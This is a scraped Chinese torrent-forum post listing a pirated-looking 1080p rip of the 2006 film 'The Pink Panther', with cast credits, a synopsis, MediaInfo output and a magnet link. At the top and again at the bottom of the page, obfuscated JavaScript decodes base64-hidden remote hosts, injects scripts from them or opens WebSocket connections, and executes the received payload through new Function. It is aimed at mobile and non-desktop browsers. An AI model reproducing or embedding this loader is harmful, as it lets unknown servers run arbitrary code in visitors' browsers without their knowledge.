粉红豹[中文字幕].The.Pink.Panther.2006.1080p.BluRay.x265.10bit.DTS 5.96GB

版主小s 1月前 379

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 粉红豹 / 顽皮豹 / 新粉红豹

◎片 名 The Pink Panther

◎年 代 2006

◎产 地 美国 / 捷克

◎类 别 喜剧 / 悬疑 / 犯罪 / 冒险

◎语 言 英语

◎上映日期 2006-02-10(美国)

◎IMDb链接 https://www.imdb.com/title/tt0383216/

◎豆瓣评分 7.3/10 (34991人评价)

◎豆瓣链接 https://movie.douban.com/subject/1309047/

◎片 长 93 分钟

◎导 演 肖恩·利维 Shawn Levy (id:1289935)

◎编 剧 莱恩·布卢姆 Len Blum (id:1278839)

史蒂夫·马丁 Steve Martin (id:1022595)

迈克尔·萨尔兹曼 Michael Saltzman (id:1296538)

莫里斯·里奇林 Maurice Richlin (id:1033730)

布莱克·爱德华兹 Blake Edwards (id:1025287)

◎演 员 史蒂夫·马丁 Steve Martin (id:1022595)

凯文·克莱恩 Kevin Kline (id:1040531)

让·雷诺 Jean Reno (id:1025182)

艾米莉·莫迪默 Emily Mortimer (id:1036322)

亨利·科泽尼 Henry Czerny (id:1007013)

杰森·斯坦森 Jason Statham (id:1049484)

克里夫·欧文 Clive Owen (id:1025147)

碧昂丝 Beyoncé (id:1113823)

亚美利哥·普雷休蒂 Americo Presciutti (id:1223745)

Kyle Willshire (id:1221084)

丹尼尔·萨乌利 Daniel Sauli (id:1328623)

安德鲁·塔伯特 Andrew Tarbet (id:1346526)

安娜·卡塔莉娜 Anna Katarina (id:1391656)

黄美玉 Jadin Wong (id:1339399)

伊斯梅尔·彼得·卡西利亚斯三世 Ismael Peter Casillas III (id:1233741)

谢拉赫·霍斯达尔 Chelah Horsdal (id:1212229)

玛瑞娃·格兰特 Mareva Galanter (id:1185800)

克里斯汀安格斯 Kristi Angus (id:1060541)

艾伦·坡尔 Aaron Pearl (id:1048251)

罗杰·里斯 Roger Rees (id:1048199)

德尔菲娜·尚内亚克 Delphine Chanéac (id:1040503)

何健民 Thomas Ho (id:1024868)

阿丽斯·塔格里奥妮 Alice Taglioni (id:1022968)

克里斯汀·肯诺恩斯 Kristin Chenoweth (id:1022589)

斯科特·阿金斯 Scott Adkins (id:1017912)

约翰·塞纳迭姆博 John Cenatiempo (id:1074569)

Ralph Drischell Ralph Drischell (id:1081659)

Monty C. Floyd Monty C. Floyd (id:1185045)

Marc Yarrish Marc Yarrish (id:1182726)

Kevin Watson Kevin Watson (id:1163175)

科琳·斯特蒂文特 Colleen Sturtevant (id:1158918)

Gregory Salata Gregory Salata (id:1143028)

伊冯·西奥 Yvonne Sciò (id:1141718)

埃里克·莫罗 Eric Moreau (id:1128717)

杰奎琳·洛弗尔 Jacqueline Lovell (id:1122334)

波利斯·麦戈法 Boris McGiver (id:1121249)

查克·杰弗里斯 Chuck Jeffreys (id:1103654)

Chad Gabriel Chad Gabriel (id:1096863)

亨利·加尔辛 Henri Garcin (id:1095341)

Timothy J. Hamilton Timothy J. Hamilton (id:1006089)

亨利·曼西尼 Henry Mancini (id:1002849)

克里斯托弗·贝克 Christophe Beck (id:1278180)

Jonathan Brown Jonathan Brown (id:1055699)

黄美玉 Jadin Wong (id:1339399)

Ilene Starger Ilene Starger (id:1298269)

Peter Rogness Peter Rogness (id:1276324)

大卫·巴克萨 David Baxa (id:1278111)

莉莉·基尔弗特 Lilly Kilvert (id:1288534)

小乔治·德蒂塔 George DeTitta Jr. (id:1282314)

Joseph G. Aulisi Joseph G. Aulisi (id:1277584)

Ned Neidhardt Ned Neidhardt (id:1303245)

Kimberly Kimble Kimberly Kimble (id:1288556)

Erwin H. Kupitz Erwin H. Kupitz (id:1289083)

David Meanti (id:1224156)

厄尔尼·F·奥萨蒂 Ernie F. Orsatti (id:1131999)

埃米·劳瑞森 Amy Lauritsen (id:1289521)

山德琳·里格奥 Sandrine Rigaux (id:1191017)

William Pruss William Pruss (id:1055419)

Brendalyn Richard Brendalyn Richard (id:1183017)

雷·麦金太尔 Ray McIntyre Jr. (id:1291625)

胡安·卡洛斯·巴尔加斯 Juan Carlos Vargas (id:1038055)

约瑟夫·贝尔 Joseph Bell (id:1309206)

Mike Hardison Mike Hardison (id:1286025)

斯科特·F·约翰斯顿 Scott F. Johnston (id:1287838)

吉姆·戈尔曼 Jim Gorman (id:1285203)

马克·弗伦德 Mark Freund (id:1284190)

◎标 签 喜剧 / 法国 / 美国 / 搞笑 / 让·雷诺 / 粉红豹 / 美国电影 / 2006

◎简 介

国际足球教练在庆功派对中不幸中毒镖毙命,手上的钻石戒指“粉红豹”也随之失踪。谋杀与失窃案迅速成为关注焦点。破案重任落到总探长德雷福斯(凯文·克莱恩 Kevin Kline 饰)肩上。无奈中,他想到了最佳破案人选——探员杰奎斯?克鲁索(史蒂夫·马丁 Steve Martin 饰)。临危受命的克劳索与总探长指派的木讷探员波顿(让·雷诺 Jean Reno 饰)组合成为一对儿“黄金搭档”。克劳索将教练女友歌坛天后仙妮娅(碧昂丝·诺尔斯 Beyoncé Knowles 饰)列为首要的嫌疑对象,谁知调查时却对她一见倾心。

一路上克劳索遭遇各种勤快,钻石贩子、黑道分子、傲气足球明星、赌场老板、风情女政客,各色人物轮番登场,究竟谁才是名钻大盗?案情的进展一波三折,克劳索该如何按时侦破这桩惊世大案,同时有效提防虎视眈眈的总探长把功劳据为己有?

◎获奖情况 (共1项)

第15届MTV电影奖 (2006)

MTV电影奖 最性感表演(提名)

└──碧昂丝 (id:1113823)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 41191770676971048830627679743312176964 (0x1EFD3F180FF0C171941FD1B9E40CA744)

  4. Complete name : [email protected]OM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 5.96 GiB

  8. Duration : 1 h 32 min

  9. Overall bit rate : 9 194 kb/s

  10. Movie name : Pink Panther, The (2006) - Blu-ray?

  11. Encoded date : UTC 2021-11-01 04:02:22

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 32 min

  23. Bit rate : 7 604 kb/s

  24. Width : 1 916 pixels

  25. Height : 1 040 pixels

  26. Display aspect ratio : 1.85:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.159

  33. Stream size : 4.93 GiB (83%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=17.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1916x1040 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. Format : DTS

  41. Format/Info : Digital Theater Systems

  42. Codec ID : A_DTS

  43. Duration : 1 h 32 min

  44. Bit rate mode : Constant

  45. Bit rate : 1 510 kb/s

  46. Channel(s) : 6 channels

  47. Channel layout : C L R Ls Rs LFE

  48. Sampling rate : 48.0 kHz

  49. Frame rate : 93.750 FPS (512 SPF)

  50. Bit depth : 24 bits

  51. Compression mode : Lossy

  52. Stream size : 1 002 MiB (16%)

  53. Language : English

  54. Default : Yes

  55. Forced : No


  56. Text #1

  57. ID : 3

  58. ID in the original source medium : 4635 (0x121B)

  59. Format : PGS

  60. Muxing mode : zlib

  61. Codec ID : S_HDMV/PGS

  62. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  63. Duration : 1 h 28 min

  64. Bit rate : 45.7 kb/s

  65. Count of elements : 2259

  66. Stream size : 28.8 MiB (0%)

  67. Title : chs&eng

  68. Language : Chinese

  69. Default : Yes

  70. Forced : No

  71. Original source medium : Blu-ray


  72. Text #2

  73. ID : 4

  74. ID in the original source medium : 4636 (0x121C)

  75. Format : PGS

  76. Muxing mode : zlib

  77. Codec ID : S_HDMV/PGS

  78. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration : 1 h 28 min

  80. Bit rate : 46.0 kb/s

  81. Count of elements : 2259

  82. Stream size : 29.0 MiB (0%)

  83. Title : cht&eng

  84. Language : Chinese

  85. Default : No

  86. Forced : No

  87. Original source medium : Blu-ray


  88. Text #3

  89. ID : 5

  90. ID in the original source medium : 4637 (0x121D)

  91. Format : PGS

  92. Muxing mode : zlib

  93. Codec ID : S_HDMV/PGS

  94. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  95. Duration : 1 h 28 min

  96. Bit rate : 25.8 kb/s

  97. Count of elements : 2259

  98. Stream size : 16.3 MiB (0%)

  99. Title : chs

  100. Language : Chinese

  101. Default : No

  102. Forced : No

  103. Original source medium : Blu-ray


  104. Text #4

  105. ID : 6

  106. ID in the original source medium : 4638 (0x121E)

  107. Format : PGS

  108. Muxing mode : zlib

  109. Codec ID : S_HDMV/PGS

  110. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  111. Duration : 1 h 28 min

  112. Bit rate : 26.0 kb/s

  113. Count of elements : 2259

  114. Stream size : 16.4 MiB (0%)

  115. Title : cht

  116. Language : Chinese

  117. Default : No

  118. Forced : No

  119. Original source medium : Blu-ray


  120. Text #5

  121. ID : 7

  122. ID in the original source medium : 4608 (0x1200)

  123. Format : PGS

  124. Muxing mode : zlib

  125. Codec ID : S_HDMV/PGS

  126. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  127. Duration : 1 h 27 min

  128. Bit rate : 35.6 kb/s

  129. Count of elements : 2320

  130. Stream size : 22.2 MiB (0%)

  131. Title : eng

  132. Language : English

  133. Default : No

  134. Forced : No

  135. Original source medium : Blu-ray


  136. Menu

  137. 00:00:00.000 : en:Chapter 01

  138. 00:06:06.908 : en:Chapter 02

  139. 00:09:26.232 : en:Chapter 03

  140. 00:17:46.774 : en:Chapter 04

  141. 00:23:05.467 : en:Chapter 05

  142. 00:28:56.776 : en:Chapter 06

  143. 00:32:56.307 : en:Chapter 07

  144. 00:37:46.889 : en:Chapter 08

  145. 00:42:45.145 : en:Chapter 09

  146. 00:49:46.525 : en:Chapter 10

  147. 00:56:00.273 : en:Chapter 11

  148. 01:00:01.014 : en:Chapter 12

  149. 01:07:40.723 : en:Chapter 13

  150. 01:13:45.087 : en:Chapter 14

  151. 01:19:46.698 : en:Chapter 15

  152. 01:25:40.677 : en:Chapter 16


TAGS 冒险 悬疑 犯罪 喜剧

磁力链:
  • magnet:?xt=urn:btih:1533133B77E46C90EB51F266AB2ED2BE064D5692

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};